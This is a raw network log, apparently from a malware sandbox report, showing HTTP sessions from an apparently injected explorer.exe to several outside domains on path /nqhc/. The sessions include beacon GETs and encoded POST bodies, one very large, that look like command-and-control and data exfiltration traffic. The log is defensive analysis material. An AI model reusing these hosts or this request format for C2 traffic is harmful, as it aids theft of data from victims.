                                                                                                                                                                          Dec 5, 2022 15:18:46.442820072 CET12426INData Raw: 7b 24 83 98 d1 c1 1e e5 7c 8f f8 c3 dd 3e 67 e2 8a e0 4e 06 7b 1a 9d 0e 3a 05 30 7b 84 c5 83 bd f1 c4 8d a9 ba 72 43 2e a3 2b b7 7c 75 4b 88 54 c1 68 b0 97 1a 93 f7 7c 5f c9 29 e5 06 a2 34 e1 32 a4 dc 8b 64 e6 4f 72 37 92 c2 80 30 be 49 21 03 ed
                                                                                                                                                                          Data Ascii: {$|>gN{:0{rC.+|uKTh|_)42dOr70I!X>LV{xOSc@]O0|B)63?aT31.Q(AJL5;HP^Gf(;)A"{sY&f:tR-i+r+\8c
                                                                                                                                                                          Dec 5, 2022 15:18:46.442874908 CET12427INData Raw: 0f 95 49 ac 91 87 ff 3f fb fd df 56 0f b6 f6 76 b0 b5 99 83 7f bb f7 9f e2 de bc 50 39 07 77 0a 1c ab fe 55 1d ec 75 3b a7 cd e0 f4 a8 79 7c d2 69 db a6 de e9 c9 49 ab dd 6d 9d 76 82 e0 f8 a8 fb f9 fd ed 1d 23 6e e7 b8 d9 2d fb b4 b1 63 6b 85 c3
                                                                                                                                                                          Data Ascii: I?VvP9wUu;y|iImv#n-ck8A_\24&ZB*oS9Dj0Q_:=L&Ifip&/MZZ><dTh;Qq"%E yh31,d7#4?cP#
                                                                                                                                                                          Dec 5, 2022 15:18:46.442929983 CET12429INData Raw: aa 11 bb c6 e9 0b 5e 91 c5 b0 1b 2c ac 5c 27 d4 fb b9 2c 19 f7 39 5b e4 22 df cc 0d ba 0b a2 b3 20 59 3c 9b 69 0e 6e 54 68 23 97 a3 32 fc 08 91 b9 1f 47 b0 61 9f 92 54 c1 08 ed 64 4c ae 7b be af e4 94 72 03 51 9a 70 19 52 ee 45 32 73 86 df c9 0c
                                                                                                                                                                          Data Ascii: ^,\',9[" Y<inTh#2GaTdL{rQpRE2s>p6]CqZ3iEx4q;H~YV[04yW|V'[2f4Gx$ohd+6+8dvWp,1Ic#rK7#F\j GCj
                                                                                                                                                                          Dec 5, 2022 15:18:46.442986012 CET12430INData Raw: 26 ed fb d5 6b 99 7d 27 75 6f 93 75 5b cd 56 cb 0f 02 7f 6f 48 7e 90 63 c8 42 50 c4 c6 c8 12 e2 1f 86 6b 5a b8 b7 91 91 9f 03 ad 79 6a d1 2e 20 37 9f 87 5d f3 c4 e2 bd 28 92 42 9b 4f 07 3b b6 60 ff 59 f0 e9 a7 43 1d 55 50 02 3e 1d aa 6b a1 de d0
                                                                                                                                                                          Data Ascii: &k}'uou[VoH~cBPkZyj. 7](BO;`YCUP>k@S+?]BB}]/})b9?1p?_BYr3J2 08>q,6CvwfxDyJEyATs@g#
                                                                                                                                                                          Dec 5, 2022 15:18:46.556859016 CET12431INData Raw: e4 a1 db 76 96 11 77 ca 82 f9 08 f9 54 d9 11 49 24 85 a1 0c 07 75 d6 b0 ca 67 f9 59 e8 36 9d 21 ea 5e 8a 3c d3 78 32 99 78 e3 09 1a 21 03 5d 0a 5c 1d fd 91 02 70 63 aa ae dc 89 54 71 ae 40 6b b7 7c f2 89 a1 2a 01 33 d8 bb 0c 39 15 57 7b c3 af 31
                                                                                                                                                                          Data Ascii: vwTI$ugY6!^<x2x!]\pcTq@k|*39W{1Y?,f\^q}n<k#%9/rb#\JrWl,*\?.JHS^-rWXzD,7LsYG:Uti/$I]"q?j#g


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          67192.168.11.2049912192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:18:48.078620911 CET12432OUTGET /nqhc/?7nWHV=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.royaltechglobal.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:18:48.318914890 CET12432INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:18:48 GMT
                                                                                                                                                                          Server: nginx/1.23.2
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                          X-Redirect-By: WordPress
                                                                                                                                                                          Location: http://royaltechglobal.com/nqhc/?7nWHV=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&t0D=yFNHS0IX
                                                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                                                          X-Server-Cache: true
                                                                                                                                                                          X-Proxy-Cache: MISS


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          68192.168.11.204992038.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:03.502260923 CET12485OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.xiaoxiuzhen.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.xiaoxiuzhen.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.xiaoxiuzhen.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 41 6b 61 4d 58 5f 51 6b 64 4c 66 56 66 61 4d 5f 6d 5a 4f 34 66 74 76 48 31 61 4f 4e 47 2d 55 4e 30 75 54 36 48 42 64 55 46 73 56 41 5a 72 46 4b 71 72 49 34 49 46 38 58 6b 56 71 49 44 53 6f 37 48 59 66 6d 76 6c 53 46 63 62 37 6c 66 7a 36 4c 4c 6a 4c 4e 7e 50 69 45 77 6f 67 37 30 34 5a 51 47 53 75 6c 4a 4f 5a 5f 47 33 41 6e 39 7a 78 65 63 33 34 76 69 56 75 78 43 30 5a 65 35 71 37 57 52 72 44 33 31 4d 6b 59 73 56 30 46 6e 77 75 55 63 75 54 48 35 37 42 54 73 5a 4a 36 6a 6e 6e 59 6a 61 34 5a 65 32 42 37 6b 64 47 49 7e 49 71 63 59 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=AkaMX_QkdLfVfaM_mZO4ftvH1aONG-UN0uT6HBdUFsVAZrFKqrI4IF8XkVqIDSo7HYfmvlSFcb7lfz6LLjLN~PiEwog704ZQGSulJOZ_G3An9zxec34viVuxC0Ze5q7WRrD31MkYsV0FnwuUcuTH57BTsZJ6jnnYja4Ze2B7kdGI~IqcYQ).
                                                                                                                                                                          Dec 5, 2022 15:19:03.709583998 CET12485INHTTP/1.1 400 Bad Request
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:03 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: d404 Not Found0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          69192.168.11.204992138.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:05.686863899 CET12486OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.xiaoxiuzhen.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.xiaoxiuzhen.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.xiaoxiuzhen.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 41 6b 61 4d 58 5f 51 6b 64 4c 66 56 65 36 38 5f 71 59 4f 34 4f 4e 76 45 7e 36 4f 4e 55 2d 55 4a 30 70 62 36 48 46 45 66 47 65 78 41 5a 4b 31 4b 70 76 6b 34 50 46 38 58 73 31 71 4e 63 43 6f 30 48 59 53 62 76 67 71 46 63 59 48 6c 65 41 79 4c 63 6a 4c 4b 78 76 69 44 33 6f 67 6d 28 59 5a 4f 47 53 54 45 4a 50 4e 5f 47 48 73 6e 38 78 70 65 57 47 34 73 7a 6c 75 33 56 6b 5a 66 75 36 37 69 52 72 65 4b 31 4f 30 6d 73 6a 55 46 6d 51 4f 55 64 75 54 59 78 4c 42 59 6a 35 49 5f 6b 6d 54 49 71 72 41 70 41 31 52 45 38 75 48 4a 37 4c 76 67 47 39 30 75 4d 47 64 53 30 6b 48 4a 46 76 4d 58 48 78 37 55 7e 64 6e 76 7e 61 59 71 63 35 6e 4c 28 56 5a 6c 35 4e 34 6a 74 6c 65 62 51 50 63 39 6d 61 77 35 6b 66 53 6e 72 6c 34 57 38 42 33 61 54 66 6d 72 49 72 6d 6c 42 68 65 45 7a 38 44 38 70 45 41 74 51 32 63 64 72 34 44 4b 42 46 30 58 4a 7a 41 6e 44 33 70 39 59 55 39 61 46 66 53 73 4f 48 6f 58 6f 52 42 36 35 34 65 7a 79 49 65 4a 62 6d 64 48 52 2d 4a 66 32 44 4d 66 63 52 69 6f 37 7a 6b 77 51 71 28 68 4a 6b 79 45 63 47 6d 6c 74 70 6d 6b 64 73 59 57 57 53 63 79 4a 33 5a 72 71 6f 69 67 28 70 36 75 42 39 34 5a 37 4a 64 7a 75 70 56 57 35 79 4f 43 6a 70 49 62 34 64 67 46 41 31 44 43 55 77 46 69 35 30 46 52 72 4e 4a 54 4b 75 32 38 43 37 72 74 70 6e 48 57 49 35 4a 35 6b 6e 73 61 66 5f 58 4e 6e 30 59 34 6d 43 65 74 58 71 65 42 4c 4e 30 33 31 34 46 68 5a 6a 64 39 61 64 7e 64 4e 4a 39 76 6f 77 49 4c 6d 5a 76 7a 68 52 6f 61 34 6d 58 51 46 41 77 68 4e 41 68 31 69 68 7a 52 44 4e 57 5a 4e 53 77 58 69 6b 63 62 6f 74 6f 32 41 34 66 65 72 4c 57 74 56 66 6a 53 31 74 4a 30 68 48 63 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=AkaMX_QkdLfVe68_qYO4ONvE~6ONU-UJ0pb6HFEfGexAZK1Kpvk4PF8Xs1qNcCo0HYSbvgqFcYHleAyLcjLKxviD3ogm(YZOGSTEJPN_GHsn8xpeWG4szlu3VkZfu67iRreK1O0msjUFmQOUduTYxLBYj5I_kmTIqrApA1RE8uHJ7LvgG90uMGdS0kHJFvMXHx7U~dnv~aYqc5nL(VZl5N4jtlebQPc9maw5kfSnrl4W8B3aTfmrIrmlBheEz8D8pEAtQ2cdr4DKBF0XJzAnD3p9YU9aFfSsOHoXoRB654ezyIeJbmdHR-Jf2DMfcRio7zkwQq(hJkyEcGmltpmkdsYWWScyJ3Zrqoig(p6uB94Z7JdzupVW5yOCjpIb4dgFA1DCUwFi50FRrNJTKu28C7rtpnHWI5J5knsaf_XNn0Y4mCetXqeBLN0314FhZjd9ad~dNJ9vowILmZvzhRoa4mXQFAwhNAh1ihzRDNWZNSwXikcboto2A4ferLWtVfjS1tJ0hHc.
                                                                                                                                                                          Dec 5, 2022 15:19:05.887490988 CET12487INHTTP/1.1 400 Bad Request
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:05 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: d404 Not Found0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          7192.168.11.2049842154.204.24.4580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:13.280183077 CET11152OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.youlian.fund
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.youlian.fund
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.youlian.fund/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 42 6d 47 30 73 32 7a 6e 35 58 66 6d 68 48 6f 57 30 62 7e 34 59 48 41 55 32 31 77 35 52 51 34 67 73 72 39 32 4d 48 45 58 4e 67 6b 55 74 6f 4e 4f 32 4a 78 4a 39 46 72 45 57 76 4d 45 56 5a 42 6b 35 64 56 76 42 4b 68 6a 46 32 36 6a 46 57 43 77 50 79 32 58 32 74 64 6b 7e 36 78 70 70 6c 72 63 4c 79 5a 51 6a 78 68 58 62 68 4c 44 38 62 66 59 78 61 53 44 4a 71 4e 32 66 38 36 4e 69 4c 44 62 63 74 43 64 64 38 4c 34 53 46 7a 6e 33 53 34 39 69 74 44 67 52 34 4b 55 48 4d 52 6a 38 6b 51 7a 75 78 71 49 5a 47 7a 74 4b 42 45 46 7e 5a 77 35 70 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=BmG0s2zn5XfmhHoW0b~4YHAU21w5RQ4gsr92MHEXNgkUtoNO2JxJ9FrEWvMEVZBk5dVvBKhjF26jFWCwPy2X2tdk~6xpplrcLyZQjxhXbhLD8bfYxaSDJqN2f86NiLDbctCdd8L4SFzn3S49itDgR4KUHMRj8kQzuxqIZGztKBEF~Zw5pw).
                                                                                                                                                                          Dec 5, 2022 15:15:13.616744995 CET11152INHTTP/1.1 400 Bad Request
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:13 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: d404 Not Found0
                                                                                                                                                                          Dec 5, 2022 15:15:13.864640951 CET11153INData Raw: 0a
                                                                                                                                                                          Data Ascii:


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          70192.168.11.204992238.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:07.876416922 CET12490OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.xiaoxiuzhen.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.xiaoxiuzhen.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.xiaoxiuzhen.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 41 6b 61 4d 58 5f 51 6b 64 4c 66 56 65 36 38 5f 71 59 4f 34 4f 4e 76 45 7e 36 4f 4e 55 2d 55 4a 30 70 62 36 48 46 45 66 47 65 35 41 59 38 70 4b 71 49 77 34 4f 46 38 58 69 56 71 4d 63 43 6f 70 48 5a 36 66 76 67 33 77 63 64 44 6c 65 52 69 4c 63 52 7a 4b 68 5f 69 47 34 49 67 34 30 34 59 4e 47 53 76 51 4a 50 5a 76 47 30 77 6e 39 32 56 65 63 52 73 76 37 56 75 78 56 6b 5a 62 39 71 37 71 52 72 4b 61 31 4f 34 6d 73 6c 63 46 6e 69 47 55 66 39 37 59 38 37 42 58 34 70 49 4f 75 47 53 68 71 72 55 62 41 31 52 79 38 73 72 4a 37 4d 37 67 48 36 67 70 4d 6d 64 53 33 6b 47 66 42 76 49 62 48 78 58 63 7e 63 6a 76 7e 64 63 71 61 5a 6e 4c 76 68 74 36 37 74 35 71 67 46 66 5a 64 76 51 6c 6d 65 67 4c 6b 61 43 6e 72 56 73 57 38 79 66 61 66 65 6d 72 55 62 6d 6e 65 52 65 58 34 63 44 34 70 45 51 50 51 32 38 6e 72 5f 37 4b 43 6b 34 58 62 43 41 6d 55 6e 70 42 58 30 38 65 53 76 58 34 4f 45 51 4c 6f 52 42 71 35 36 79 7a 31 34 75 4a 4a 69 4a 47 63 4f 49 32 71 44 4e 59 57 78 75 6d 37 33 4d 34 51 71 33 50 4a 6e 7e 45 66 6d 6d 6c 6f 4b 7e 6e 58 63 59 4d 61 79 64 72 48 58 5a 43 71 6f 7e 38 28 74 72 62 42 4e 55 5a 36 39 35 7a 69 5a 56 4a 70 53 4f 47 73 4a 49 64 38 64 67 46 41 31 66 57 55 77 35 69 35 6c 39 52 70 36 74 54 50 35 69 38 41 37 72 72 70 6e 48 39 49 35 55 46 6b 6b 4d 6b 66 37 71 6f 6e 78 67 34 6c 57 61 74 44 4c 65 43 62 4e 30 34 78 34 46 32 58 44 51 37 61 64 69 46 4e 4e 68 5f 6f 43 4d 4c 6c 5a 66 7a 6c 52 6f 56 74 32 58 58 53 77 78 34 48 67 38 71 69 67 65 70 44 4f 4c 63 4e 56 30 58 67 54 64 45 74 74 6b 5f 53 62 28 46 76 73 43 38 54 63 58 36 6d 64 52 49 30 79 77 70 4a 51 65 4f 32 37 6f 36 48 62 59 77 5a 66 44 36 75 47 64 4b 43 43 6a 7a 6c 48 78 48 6b 4e 39 46 58 4a 70 63 66 58 59 63 68 45 53 56 70 31 47 64 68 65 48 48 6a 79 4b 48 79 79 33 48 75 6b 32 6a 6d 74 63 48 56 4e 74 7a 4a 44 58 56 50 7a 43 64 55 30 58 53 63 43 44 4c 61 34 58 34 36 4e 39 5f 6b 6d 62 63 75 6a 44 63 53 43 62 66 71 52 42 62 47 42 35 50 47 38 74 43 53 6c 4e 5a 4c 4b 31 50 70 46 7a 55 7a 53 4c 47 58 46 52 31 4c 61 48 6c 6f 59 79 39 47 7a 67 54 43 57 78 30 44 4a 76 51 50 6c 33 48 48 33 7e 5f 6b 59 35 49 73 7a 75 58 30 79 71 68 45 33 55 54 56 47 44 4a 28 58 55 7a 62 38 63 51 36 79 43 54 74 30 58 78 36 43 5a 72 68 59 37 73 42 41 68 74 79 34 30 36 50 45 61 6c 30 6e 71 62 4c 71 6f 50 6d 6f 45 50 78 7a 4d 64 65 77 36 75 70 51 77 46 39 75 32 31 35 51 4c 76 62 36 28 32 5a 6b 73 47 50 69 75 43 58 37 38 4e 38 45 69 71 6c 55 66 76 7a 4e 69 35 45 67 79 39 37 62 47 47 61 64 69 69 49 4d 48 66 6e 6f 6c 64 42 67 7a 5a 73 70 6b 75 35 42 4a 6b 47 69 31 51 4f 78 6f 4f 28 4c 55 72 43 76 6f 66 61 49 35 49 69 64 38 72 69 4e 55 69 53 52 78 35 48 30 79 36 6b 6e 39 52 71 48 6f 57 49 73 4d 36 67 71 62 6f 78 30 6c 67 55 70 6f 4e 45 6a 6f 73 42 77 62 57 61 74 35 4a 46 59 76 65 69 6f 7e 2d 7a 30 50 4b 76 66 64 54 74 73 37 79 55 5a 77 74 70 70 30 41 62 57 79 72 50 56 65 30 54 55 4c 54 48 51 4c 4f 35 2d 6e 4f 44 65 42 54 34 42 4b 31 45 42 6a 75 7a 31 51 36 49 7a 65 6f 74 36 6c 71 77 52 43 62 69 33 66 65 33 2d 6d 6d 39 6b 6b 36 6d 61 79 43 4c 67 64 57 41 5f 6f 49 55 42 6d 6b 39 56 6c 6c 35 64 69 73 7e 58 38 46 67 64 41 54 7a 35 78 78 6d 37 7e 6e 54 50 30 53 5a 44 47 69 39 63 67 6e 31 74 4f 56 49 41 42 45 37 55 37 57 58 75 37 2d 79 48 57 75 63 6f 57 57 7e 6d 4f 62 42 39 36 6d 45 42 65 45 48 44 6c 43 49 33 47 6c 34 30 6f 31 74 6a 54 46 57 72 76 30 4d 5f 75 6b 36 6b 65 49 32 74 62 64 33 53 4f 57 73 68 39 69 31 65 7a 34 56 73 72 4c 34 5f 76 69 63 42 71 6e 51 59 41 31 6c 57 7e 31 79 52 35 45 66 59 69 56 28 51 71 4a 6f 6e 38 75 61 64 43 4e 6e 50 61 39 35 62 28 57 78 4c 6c 6d 33 47 77 43 4d 4b 31 57 72 67 4b 75 65 47 68 6a 67 62 67 56 46 4d 4f 70 47 55 73 55 6e 46 4f 4f 63 4e 6d 41 6a 57 67 2d 53 30 50 4d 44 6f 45 37 69 55 43 78 71 41 51 78 4f 44 43 6f 61 62 65 34 69 64 30 72 76 30 53 50 61 77 37 7a 64 7a 34 74 49 65 67 48 33 79 6d 37 62 73 57 6f 64 4d 79 69 6c 68 43 52 6e 52 74 30 56 49 34 58 71 63 63 30 6d 43 43 43 62 75 62 66 66 38 67 59 54 30 59 71 75 4c 70 65 31 59 7a 4c 6b 31 51 2d 36 44 70 6d 70 56 49 44 4f 64 68 59 70 43 5a 45 47 35 48 4f 79 46 48 6b 75 78 37 50 49 35 44 66 41 45 31 6c 7e
                                                                                                                                                                          Data Ascii: 7nWHV=AkaMX_QkdLfVe68_qYO4ONvE~6ONU-UJ0pb6HFEfGe5AY8pKqIw4OF8XiVqMcCopHZ6fvg3wcdDleRiLcRzKh_iG4Ig404YNGSvQJPZvG0wn92VecRsv7VuxVkZb9q7qRrKa1O4mslcFniGUf97Y87BX4pIOuGShqrUbA1Ry8srJ7M7gH6gpMmdS3kGfBvIbHxXc~cjv~dcqaZnLvht67t5qgFfZdvQlmegLkaCnrVsW8yfafemrUbmneReX4cD4pEQPQ28nr_7KCk4XbCAmUnpBX08eSvX4OEQLoRBq56yz14uJJiJGcOI2qDNYWxum73M4Qq3PJn~EfmmloK~nXcYMaydrHXZCqo~8(trbBNUZ695ziZVJpSOGsJId8dgFA1fWUw5i5l9Rp6tTP5i8A7rrpnH9I5UFkkMkf7qonxg4lWatDLeCbN04x4F2XDQ7adiFNNh_oCMLlZfzlRoVt2XXSwx4Hg8qigepDOLcNV0XgTdEttk_Sb(FvsC8TcX6mdRI0ywpJQeO27o6HbYwZfD6uGdKCCjzlHxHkN9FXJpcfXYchESVp1GdheHHjyKHyy3Huk2jmtcHVNtzJDXVPzCdU0XScCDLa4X46N9_kmbcujDcSCbfqRBbGB5PG8tCSlNZLK1PpFzUzSLGXFR1LaHloYy9GzgTCWx0DJvQPl3HH3~_kY5IszuX0yqhE3UTVGDJ(XUzb8cQ6yCTt0Xx6CZrhY7sBAhty406PEal0nqbLqoPmoEPxzMdew6upQwF9u215QLvb6(2ZksGPiuCX78N8EiqlUfvzNi5Egy97bGGadiiIMHfnoldBgzZspku5BJkGi1QOxoO(LUrCvofaI5Iid8riNUiSRx5H0y6kn9RqHoWIsM6gqbox0lgUpoNEjosBwbWat5JFYveio~-z0PKvfdTts7yUZwtpp0AbWyrPVe0TULTHQLO5-nODeBT4BK1EBjuz1Q6Izeot6lqwRCbi3fe3-mm9kk6mayCLgdWA_oIUBmk9Vll5dis~X8FgdATz5xxm7~nTP0SZDGi9cgn1tOVIABE7U7WXu7-yHWucoWW~mObB96mEBeEHDlCI3Gl40o1tjTFWrv0M_uk6keI2tbd3SOWsh9i1ez4VsrL4_vicBqnQYA1lW~1yR5EfYiV(QqJon8uadCNnPa95b(WxLlm3GwCMK1WrgKueGhjgbgVFMOpGUsUnFOOcNmAjWg-S0PMDoE7iUCxqAQxODCoabe4id0rv0SPaw7zdz4tIegH3ym7bsWodMyilhCRnRt0VI4Xqcc0mCCCbubff8gYT0YquLpe1YzLk1Q-6DpmpVIDOdhYpCZEG5HOyFHkux7PI5DfAE1l~81Bu2AxsMYWtPUWiwzjRzyziREHFfQ0Hqf9M-zhYg2-29JKQ-1VKNq_6f3K3cJKdQpTaCp5BtEg8-tA0N1HMR21K85bfYijlfFcppg-hONfCJ3CyLXKdVkJ3oe7QNQDXq6_dtar4XJB3eBwfceAuZSLQDr5LWBGpWLJsYBNIvpb6QxlsgKSZIhYe3uJYYsH73SxgcQEZXcz91MgbyWlen75Ss8_57KuKXqFDwfq2nAt7oSYUbb3CrrUwaP9z_Gh9WHe3ukzpRXr0cXVhwKBlhdSDVI8bOJhg0RIzpthgdGkSg6v~ccqGcuzj11uBa1rw2uIGWusAIaJ6dVTWwY2z_0vvT(SxxE2xogwFEFyxVzPghHGopetkplG(cspg70chkYLY0z9DHDFP8O5oebmtSUltMmp5LlVY5zvxI(_mzFJM-JmV8pIKZP2lOldZX8YytCcnUEr5Mi-kSLcnG7FtSzgOMRvUnxTztM4R0E2jz7WeMwgpELOiNmCNGjOJ5dDgVj0EhCoko2UBpp5GEYkKa9buWMTRpTb7hJuNb61S2Tp9iG8r8k2fZ2G6ywi0oT3B9rTK2c0qGiv70o8nPdNL3W1e_gFFtkF4SUt9iEiuVz6ksIxrVT9mywjDgjxX2~EpTTDKSDQjwqW67mEqGfoD6NwlO1xfpgp2jBaoypNTNedjtdPpW2tnFAGUw6kBMS2E4o8EAMUVT~1zvrhWW4-aqpqaKjuK1ZugpJ1dxKrYyOEytcscRVZZrqVIGeJH9B1lzv5zfhkJUVLsNgyaQMeIfNUQgJ5rohKUrE7g-e
                                                                                                                                                                          Dec 5, 2022 15:19:07.876516104 CET12500OUTData Raw: 79 47 74 56 71 4c 62 7a 33 32 6b 6c 39 46 41 58 32 74 4f 63 53 66 69 44 34 4f 4a 59 71 33 2d 71 4e 39 6d 65 49 4f 70 78 2d 52 54 70 36 64 42 46 34 36 33 28 6c 65 36 31 78 4d 2d 45 4c 44 67 52 44 58 63 53 61 7a 67 55 46 65 47 69 5f 45 73 57 34 79
                                                                                                                                                                          Data Ascii: yGtVqLbz32kl9FAX2tOcSfiD4OJYq3-qN9meIOpx-RTp6dBF463(le61xM-ELDgRDXcSazgUFeGi_EsW4ydQMt6qooIFqhwf-c3UROILsyvi3W2lwePEGyIx-MB~sMiPW2cRFKrJTUioQSqsDyKqutrtIWrOUrnMcARkPY-mqPpH67c8bheXIwcmog6A78L(SZJ42N5R2xpJ3jh1PkWCRwPsd3I3wP9406TDx1VLB3xLzjrIE~n
                                                                                                                                                                          Dec 5, 2022 15:19:08.041935921 CET12501OUTData Raw: 78 48 43 33 74 72 54 67 42 61 6a 79 72 35 74 45 37 76 6a 69 4e 7e 54 77 2d 4b 72 53 4e 48 45 38 45 67 51 77 52 4a 47 78 52 59 38 36 4b 63 51 39 4a 28 65 4b 59 4f 44 61 31 68 4e 34 35 6b 48 32 36 62 4e 7e 52 70 6d 55 6d 78 49 78 56 28 6c 47 49 59
                                                                                                                                                                          Data Ascii: xHC3trTgBajyr5tE7vjiN~Tw-KrSNHE8EgQwRJGxRY86KcQ9J(eKYODa1hN45kH26bN~RpmUmxIxV(lGIYjCnnbCdnlAEeL2EU1eo1FHTVVWaPhQcP_xXVMrFzZvhA-LKRntZ4FiLh4Ca~O0jZq~if7pmo8z0LkfyC1Ywan82V5hfa-qhAFCpEz9cDkD2jHWmxNGjn_VuwYZql1NTjY1OAX4eXSMOXzU3WoqoAEseQ-MZ7QM0R8
                                                                                                                                                                          Dec 5, 2022 15:19:08.042119980 CET12511OUTData Raw: 64 59 64 54 58 43 31 36 32 30 75 68 45 77 73 68 44 47 51 30 43 52 4d 4e 68 64 35 33 74 79 47 7a 73 52 54 62 48 6c 54 32 48 4a 4b 38 2d 37 65 33 6c 6e 5a 39 38 69 50 51 37 43 56 58 68 66 41 6d 65 32 31 6f 35 5a 4b 4a 34 6b 62 59 78 73 6d 74 57 6f
